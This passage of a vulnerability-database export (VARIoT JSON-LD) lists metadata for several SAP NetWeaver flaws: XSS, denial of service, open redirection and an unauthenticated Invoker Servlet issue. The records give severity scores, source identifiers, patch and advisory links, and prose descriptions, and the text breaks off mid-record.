"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": null
}
],
"sources": [
{
"db": "IVD",
"id": "dadd0ddc-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "afafec56-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14588"
},
{
"db": "CNVD",
"id": "CNVD-2013-14602"
},
{
"db": "BID",
"id": "63788"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005195"
},
{
"db": "NVD",
"id": "CVE-2013-6816"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-287"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6816"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Evdokimov of ERPScan.",
"sources": [
{
"db": "BID",
"id": "63788"
}
],
"trust": 0.3
},
"cve": "CVE-2013-6816",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2013-6816",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2013-14588",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2013-14602",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "dadd0ddc-1efc-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "afafec56-1efc-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-6816",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2013-14588",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2013-14602",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201311-287",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "dadd0ddc-1efc-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "afafec56-1efc-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "dadd0ddc-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "afafec56-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14588"
},
{
"db": "CNVD",
"id": "CNVD-2013-14602"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005195"
},
{
"db": "NVD",
"id": "CVE-2013-6816"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-287"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in the (1) JavaDumpService and (2) DataCollector servlets in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Since some unknown input related to the JavaDumpService servlet and the DataCollector servlet is not properly filtered before being returned to the user, the attacker can exploit the vulnerability to execute arbitrary HTML and script code in the user\u0027s browser session of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6816"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005195"
},
{
"db": "CNVD",
"id": "CNVD-2013-14588"
},
{
"db": "CNVD",
"id": "CNVD-2013-14602"
},
{
"db": "BID",
"id": "63788"
},
{
"db": "IVD",
"id": "dadd0ddc-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "afafec56-1efc-11e6-abef-000c29c66e3d"
}
],
"trust": 3.33
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6816",
"trust": 3.5
},
{
"db": "SECUNIA",
"id": "55777",
"trust": 2.8
},
{
"db": "BID",
"id": "63788",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2013-14588",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2013-14602",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201311-287",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005195",
"trust": 0.8
},
{
"db": "IVD",
"id": "DADD0DDC-1EFC-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "AFAFEC56-1EFC-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "dadd0ddc-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "afafec56-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14588"
},
{
"db": "CNVD",
"id": "CNVD-2013-14602"
},
{
"db": "BID",
"id": "63788"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005195"
},
{
"db": "NVD",
"id": "CVE-2013-6816"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-287"
}
]
},
"id": "VAR-201311-0362",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "dadd0ddc-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "afafec56-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14588"
},
{
"db": "CNVD",
"id": "CNVD-2013-14602"
}
],
"trust": 1.87111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "dadd0ddc-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "afafec56-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14588"
},
{
"db": "CNVD",
"id": "CNVD-2013-14602"
}
]
},
"last_update_date": "2023-12-18T13:39:58.835000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "Patch for SAP Netweaver DataCollector and JavaDumpService Servlets Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/41194"
},
{
"title": "Patches for multiple cross-site scripting vulnerabilities in SAP Netweaver DataCollector and JavaDumpService Servlets",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/41225"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14588"
},
{
"db": "CNVD",
"id": "CNVD-2013-14602"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005195"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005195"
},
{
"db": "NVD",
"id": "CVE-2013-6816"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://secunia.com/advisories/55777"
},
{
"trust": 2.2,
"url": "https://service.sap.com/sap/support/notes/1828801"
},
{
"trust": 2.0,
"url": "http://erpscan.com/advisories/erpscan-13-018-sap-netweaver-servlet-javadumpservice-multiple-xss/"
},
{
"trust": 2.0,
"url": "http://erpscan.com/advisories/erpscan-13-019-sap-netweaver-servlet-datacollector-multiple-xss/"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-13-018-sap-netweaver-servlet-javadumpservice-multiple-xss/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-13-019-sap-netweaver-servlet-datacollector-multiple-xss/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6816"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6816"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/55777/"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14588"
},
{
"db": "CNVD",
"id": "CNVD-2013-14602"
},
{
"db": "BID",
"id": "63788"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005195"
},
{
"db": "NVD",
"id": "CVE-2013-6816"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-287"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "dadd0ddc-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "afafec56-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14588"
},
{
"db": "CNVD",
"id": "CNVD-2013-14602"
},
{
"db": "BID",
"id": "63788"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005195"
},
{
"db": "NVD",
"id": "CVE-2013-6816"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-287"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-21T00:00:00",
"db": "IVD",
"id": "dadd0ddc-1efc-11e6-abef-000c29c66e3d"
},
{
"date": "2013-11-22T00:00:00",
"db": "IVD",
"id": "afafec56-1efc-11e6-abef-000c29c66e3d"
},
{
"date": "2013-11-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14588"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14602"
},
{
"date": "2013-10-30T00:00:00",
"db": "BID",
"id": "63788"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005195"
},
{
"date": "2013-11-20T14:12:30.930000",
"db": "NVD",
"id": "CVE-2013-6816"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-287"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14588"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14602"
},
{
"date": "2013-11-21T00:27:00",
"db": "BID",
"id": "63788"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005195"
},
{
"date": "2018-12-10T19:29:01.437000",
"db": "NVD",
"id": "CVE-2013-6816"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-287"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-287"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of JavaDumpService and DataCollector Servlet cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005195"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-287"
}
],
"trust": 0.6
}
}
var-201702-1128
Vulnerability from variot
SAP NetWeaver is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201702-1128",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "98362"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "98362"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to a denial-of-service vulnerability.\nAn attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users.",
"sources": [
{
"db": "BID",
"id": "98362"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "98362",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "98362"
}
]
},
"id": "VAR-201702-1128",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:45:17.374000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2410061"
},
{
"trust": 0.3,
"url": "https://www.onapsis.com/blog/sap-security-notes-february-2017-turning-volume"
}
],
"sources": [
{
"db": "BID",
"id": "98362"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "98362"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-02-14T00:00:00",
"db": "BID",
"id": "98362"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-23T16:23:00",
"db": "BID",
"id": "98362"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "98362"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Denial of Service Vulnerability",
"sources": [
{
"db": "BID",
"id": "98362"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "98362"
}
],
"trust": 0.3
}
}
var-201709-1270
Vulnerability from variot
SAP NetWeaver is prone to open-redirection vulnerability An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-1270",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100910"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100910"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to open-redirection vulnerability\nAn attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.",
"sources": [
{
"db": "BID",
"id": "100910"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100910",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100910"
}
]
},
"id": "VAR-201709-1270",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:03:14.094000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2524134"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/09/12/sap-security-patch-day-september-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100910"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100910"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100910"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100910"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100910"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Open Redirection Vulnerability",
"sources": [
{
"db": "BID",
"id": "100910"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100910"
}
],
"trust": 0.3
}
}
var-201605-0004
Vulnerability from variot
The Invoker Servlet on SAP NetWeaver Application Server Java platforms, possibly before 7.3, does not require authentication, which allows remote attackers to execute arbitrary code via an HTTP or HTTPS request, as exploited in the wild in 2013 through 2016, aka a "Detour" attack. Attacks on this vulnerability 2013 From 2016 Observed in year. This vulnerability "Detour" It is called an attack. Vendors have confirmed this vulnerability SAP Security Note 1445998 It is released as.By a third party HTTP Or HTTPS Arbitrary code may be executed via a request. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP Netweaver Invoker Servlet has a security vulnerability that allows an attacker to call any servlet even if it is declared in a web.xml file. This includes any servlet classes available in the application classloader, such as those in the WEB-INF\classes, WEB-INF\lib, and WEB-INF\additinal-lib application directories. Multiple servlets included with Java applications are not designed for direct client access, but instead interact inside the application, thus causing arbitrary calls to be performed and invisible operations on the SAP 